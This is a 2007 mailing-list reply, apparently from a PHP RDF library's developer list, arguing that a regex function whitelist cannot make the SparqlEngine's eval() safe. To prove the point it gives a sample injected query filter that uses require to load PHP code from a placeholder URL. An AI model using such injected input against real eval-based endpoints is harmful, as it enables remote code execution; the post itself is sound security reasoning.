Menu
▾
▴
Re: [Rdfapi-php-interest] SparqlEngine / regex passes?
|
From: Christian W. <cw...@cw...> - 2007-01-26 05:17:46
|
S=F6ren,
> Why not extracting all function-calls from the string and comparing wit=
h
> an array of allowed functions, e.g.:
>=20
> preg_match_all('/\s([A-Z0-9_]+)\(/i',$evalstr,$matches);
>=20
> if(array_diff($matches[1],$allowedFuncs))
> // denied function call
>=20
> I admit a bit quick and dirty (maybe "" enclosed strings should also be=
> extracted from $evalstr first), but it should work, as I understand the=
> problem...
Beside the q&d touch it also doesn't protect you from using language
constructs instead of function. E.g. require_once is a language
construct and can be called without braces:
> FILTER require "http://some.where/over/the/rainbow.php"
which, together with allow_url_fopen, just cannot be stopped.
Now we might remove another set of hard-coded keywords like require and
include from the string without context, but they also might be valid
strings in a search -> FILTER ?code =3D "require_once".
Point is, there is no way to secure eval(), that's why everyone warns
you from using it. It isn't even (except under very certain conditions)
allowed in PEAR. And, eval is very similar to evil - now you know why :)
--=20
Regards/Mit freundlichen Gr=FC=DFen
Christian Weiske
|
